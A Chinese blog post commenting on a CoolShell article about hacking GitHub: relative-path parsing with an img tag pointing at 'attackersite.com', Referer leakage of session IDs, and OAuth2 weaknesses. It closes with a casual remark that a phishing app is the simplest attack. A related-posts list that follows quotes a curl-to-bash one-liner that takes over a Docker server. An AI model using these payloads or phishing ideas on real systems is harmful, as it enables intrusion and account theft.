看了酷壳的这篇帖子: http://coolshell.cn/articles/11021.html (从黑掉 github 学web安全开发)

觉得有几点需要学习或者了解:

1. ff/chrome 都认为  <img src=”///attackersite.com”>  这个是一个绝对路径, 最终会转换为 <img src=”attackersite.com”> , 但是server的开发可能会用正则匹配,认为这个是一个相对路径。赞呀~~ 就我个人开发而言,我一般看到 开头是 "/", 就认为是一个相对路径,当然还会做一个补刀操作就是在 “/” 之前加入自己网站的sheme, 整个域, port, web content path等。 例如///attackersite.com 就会补为: http://chillyc.info///attackersite.com, 然后我估计就跳转到一个404的页面了。大家可以试试。

2. Referer 漏洞。 这个观念应该加强。 主要原因是,如果有外域的图片或者其他的什么信息,当前的url路径就会变为 reference 送给外域。 特别是喜欢在 url中加入特殊认证信息的地方。例如sid啥的。 这里有两点可以规避, 第一是内域使用Https, 对于外域一般使用http, 这样隐秘信息就不会通过reference 发送给外域。当然浏览器的某些版本也可能会禁止访问从Https页面发送给http页面的请求。 第二个就是在HTML5, 使用<a>, <area> 标签可以加入 noreferer 这个属性,表示点击这个链接不会有Referer header发送。但是酷壳这篇文中使用的是 img 标签, 并且还是个内域的。这就无能为力了。

3. 对于 Oauth2 协议而言,其实只需要限制域名就可以。有时候限制callback URL 会让API的使用者非常难受。

4. 看完Oauth2攻击的那篇帖子,其实也就是只针对github中的gist这个东西产生了奇妙的漏洞。token都放在callback url中一起传。一般access token 是有server端获取code之后,使用consumer_secret 来获取的。也就是如果没有应用的consumer_secret, 只有access token是没有用的。其实最简易的攻击就是自己做个应用,直接从server端获取access_token. 这个比上面那些漏洞更加靠谱。所以做钓鱼应用就好了,嗯嗯,就是这样。

黑掉github之我见, 漏洞vs钓鱼相关推荐

  1. 从“黑掉Github”学Web安全开发

    2019独角兽企业重金招聘Python工程师标准>>> 本文转载自酷壳(CoolShell.cn),原文内容如下. Egor Homakov(Twitter:@homakov  个人 ...

  2. 一个回车键黑掉一台服务器——使用Docker时不要这么懒啊喂

    不说废话真的一个回车键: curl -sSL https://git.io/vXNB4 | bash -s test <addr:port> 自己替换<addr:port>的内 ...

  3. 如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)

    如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料 ...

  4. 德国小哥1人“黑掉”谷歌地图:99部手机就能造成交通拥堵

    十三 发自 凹非寺 量子位 报道 | 公众号 QbitAI 想要"黑掉"谷歌地图,99部手机就够了. 对于大多数开车的人来说,想要去一个不熟悉的地方,地图APP无疑是一个非常有利的 ...

  5. kali linux关闭进程,技术|如何使用 Kali Linux 黑掉 Windows

    Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具.Metasploit 项目中 Metasploit 框架支持 Kali Linu ...

  6. 栈溢出笔记1.4 黑掉example_2

    在1.2节中我们编写了一个有漏洞的程序,通过输入可以控制其EIP,本节,我们要让example_2运行我们的MessageBox.再看看example_2: /******************** ...

  7. 26秒!全球销量第一的AI音箱就被腾讯黑掉了,然后变身窃听器

    雷刚 发自 凹非寺  量子位 报道 | 公众号 QbitAI 对不起,你担心的事情成真了. 现在你买一台"能说会道"的智能音箱,能秒变窃听器. 所谓AI+IoT,正在把所有人带入一 ...

  8. 利用SAP 0day,四分钟内黑掉华尔街

    本文讲的是利用SAP 0day,四分钟内黑掉华尔街,2017年5月20日,由唯品会信息安全部主办,唯品会安全应急响应中心承办的"因唯安全,所以信赖--深度揭秘唯品会信息安全建设实践 2017 ...

  9. 美国参议员建议立法“黑掉国土安全部”

    5月25日,参议员马吉·哈桑和罗博·波特曼引入<黑了国土安全部法案>,意图在国土安全部建立联邦漏洞奖励项目. 漏洞奖励项目鼓励黑客测试技术系统的安全.工程师们狩猎代码中的"漏洞& ...

最新文章

  1. openoj的一个小比赛(F题解题报告)poj3978(dp+素数筛选)
  2. 小甲鱼python003答案_小甲鱼:Python学习笔记003_函数
  3. b区计算机考研招不满的大学,b区考研招不满的大学,适合调剂的学校有哪些
  4. 图像处理(一)——使用matlab放缩图像
  5. 【评论】GNU/Linux下有多少是GNU的?
  6. 【数据库】MySQL表的增删改查
  7. 波卡生态项目Polkalokr将在Polkastarter进行IDO
  8. 重庆理工大学图像处理实验三:图像分割
  9. python调整excel列宽_python - 有没有一种方法可以使用pandas.ExcelWriter自动调整Excel列的宽度? - 堆栈内存溢出...
  10. html如何转换成中文,html页面中如何将编码转换成中文的示例代码
  11. python多进程协同_简单谈谈python中的多进程
  12. matlab中矩阵行列式,MATLAB矩阵行列式
  13. MySQL删除注册表的卸载方式
  14. PHP论坛开发技术总结
  15. 国米w ndows错误,欧冠国米1:2巴萨!球迷一席话揭球队输球真因,一语中的
  16. StumbleuponAnalysis--逻辑回归二元分类
  17. PDF打印出现:请安装Evernote程序
  18. 电子通讯秤对接配置详解!
  19. juce开发vst插件滑块参数错误
  20. 怎么让word在分页后在下一页第一行自动加上上一页未结束的标题,并在后加一个“续”字?如图:

热门文章

  1. C语言rand()函数重置种子问题
  2. Vue-快餐店收银系统-leftNav.vuePos.vue
  3. Mediapipe快餐
  4. 词云生成库wordcloud详解(三):IntegralOccupancyMap类——词云布局机制
  5. 苹果x怎么显示电量百分比_苹果数据线在充电时,显示不支持此配件该怎么办?...
  6. 深圳云计算培训:云计算开发一般负责什么工作呢?更偏向于运维么?
  7. 机器人方向与高考选专业的一些误区
  8. 联想小新潮7000触摸板失灵_联想 小新潮7000鼠标失灵怎么办?
  9. 使用观察者模式、代理模式、模板方法模式模拟QQ发空间,可以给好友设置昵称、给自己的空间设置访问权限
  10. 高通骁龙820A车用处理器全面解读